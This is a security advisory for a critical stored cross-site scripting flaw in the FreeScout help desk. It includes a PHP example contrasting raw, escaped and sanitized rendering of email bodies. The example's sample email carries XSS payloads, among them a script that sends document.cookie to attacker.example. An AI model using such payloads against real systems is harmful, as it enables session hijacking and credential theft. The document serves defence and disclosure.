PT-2026-26375 · Freescout

Published: 2026-03-19 · Updated: 2026-03-20

CVE-2026-32754

CVSS v3.1: 9.4 (Critical)
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions: FreeScout versions 1.8.208 and below

Description: FreeScout, a help desk and shared inbox built on PHP's Laravel framework, is affected by a stored cross-site scripting (XSS) issue. Incoming email bodies are stored in the database without sanitization and are then rendered unescaped in outgoing email notifications through Blade's raw output syntax, {!! $thread->body !!}. An unauthenticated attacker therefore needs nothing more than to send an email to a mailbox FreeScout monitors in order to inject arbitrary HTML or JavaScript. When the notification is opened by any subscribed agent or administrator, the injected code can execute, potentially leading to phishing, tracking, session hijacking, credential theft, or account takeover affecting all recipients.

Recommendations: Update FreeScout to version 1.8.209 or later.
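To make the mechanism concrete, the following is an added example in plain PHP; it is not FreeScout's code and not the change shipped in 1.8.209. A constructed inbound email body is rendered three ways: verbatim, which is what Blade's {!! !!} syntax compiles to; escaped, which is what Blade's {{ }} syntax compiles to; and after an allowlist sanitizer of the kind that belongs on the ingest path, before the body reaches the database. The function names (renderRaw, renderEscaped, sanitizeHtml, cleanNode), the tag and attribute allowlists and the sample body are all assumptions made for the example.

```php
<?php
// Added example, not FreeScout's code and not its 1.8.209 fix. It shows
// what Blade's raw output syntax ({!! $thread->body !!}) does with an
// unsanitized inbound email body, and two safe alternatives. All names
// below (renderRaw, renderEscaped, sanitizeHtml, cleanNode, $inboundBody)
// are hypothetical.

// Constructed email body of the kind an unauthenticated sender could
// deliver to a mailbox the help desk polls.
$inboundBody = '<p>Hello support,</p>'
    . '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    . '<img src="x" onerror="alert(document.domain)">'
    . '<a href="javascript:alert(1)">my ticket</a> '
    . '<b>thanks</b><!-- tracking: user42 -->';

// Vulnerable rendering: the stored body is concatenated verbatim, which is
// exactly what {!! $thread->body !!} compiles to. The <script>, the
// onerror handler and the javascript: link reach every recipient intact.
function renderRaw(string $body): string
{
    return '<div class="thread-body">' . $body . '</div>';
}

// Escaped rendering: what {{ $thread->body }} compiles to (Laravel's e(),
// i.e. htmlspecialchars with ENT_QUOTES). Nothing executes, but the
// sender's formatting is shown as literal tags.
function renderEscaped(string $body): string
{
    return '<div class="thread-body">'
        . htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</div>';
}

// Allowlist sanitizer for the ingest path: run it once before the body is
// written to the database, so every later raw render sees clean HTML.
// Elements that can run or load code are dropped with their content,
// unknown elements are unwrapped (their text is kept), attributes are
// allowed per tag, and href must be http(s).
function sanitizeHtml(string $html): string
{
    $doc = new DOMDocument();
    // Mail clients emit sloppy HTML; silence libxml's parse warnings.
    @$doc->loadHTML('<!DOCTYPE html><html><head><meta charset="utf-8"></head><body>'
        . $html . '</body></html>');
    $body = $doc->getElementsByTagName('body')->item(0);
    cleanNode($body);

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function cleanNode(DOMNode $node): void
{
    static $keep  = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'a', 'ul', 'ol', 'li', 'blockquote', 'div', 'span'];
    static $drop  = ['script', 'style', 'iframe', 'object', 'embed', 'svg', 'math', 'form', 'meta', 'link', 'base'];
    static $attrs = ['a' => ['href']];

    // Snapshot the list: the loop removes and moves children.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child instanceof DOMText) {
            continue;                       // text is inert once element context is clean
        }
        if (!$child instanceof DOMElement) {
            $node->removeChild($child);     // comments, PIs: not needed in a ticket body
            continue;
        }
        $tag = strtolower($child->tagName);
        if (in_array($tag, $drop, true)) {
            $node->removeChild($child);     // dropped with its content
            continue;
        }
        cleanNode($child);                  // clean the subtree first
        if (!in_array($tag, $keep, true)) { // unknown tag: keep its cleaned children only
            while ($child->firstChild) {
                $node->insertBefore($child->firstChild, $child);
            }
            $node->removeChild($child);
            continue;
        }
        foreach (iterator_to_array($child->attributes) as $attr) {
            $name = strtolower($attr->name);
            $allowed = in_array($name, $attrs[$tag] ?? [], true)
                && ($name !== 'href' || preg_match('#^https?://#i', trim($attr->value)));
            if (!$allowed) {
                $child->removeAttribute($attr->name);   // drops on* handlers and javascript: links
            }
        }
    }
}

echo renderRaw($inboundBody), PHP_EOL;                // script, onerror and javascript: all survive
echo renderEscaped($inboundBody), PHP_EOL;            // inert, but shown as literal tags
echo renderRaw(sanitizeHtml($inboundBody)), PHP_EOL;  // <p>, <a>, <b> kept; script, img, handlers, comment gone
```

Escaping at the template ({{ }}) is the smallest change but destroys the formatting a help desk needs to show, which is why raw output was used in the first place. Sanitizing on ingest keeps the formatting and also protects every other place the stored body is rendered, not just the notification template; the allowlist above is deliberately small, and a production deployment would normally reach for a maintained HTML purifier library rather than a hand-written walker.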

Exploit

Fix

Weakness Enumeration

XSS
Improper Encoding or Escaping of Output

Related Identifiers

BDU:2026-04697
CVE-2026-32754
GHSA-56H2-5556-R6MG

Affected Products

FreeScout
Laravel
PHP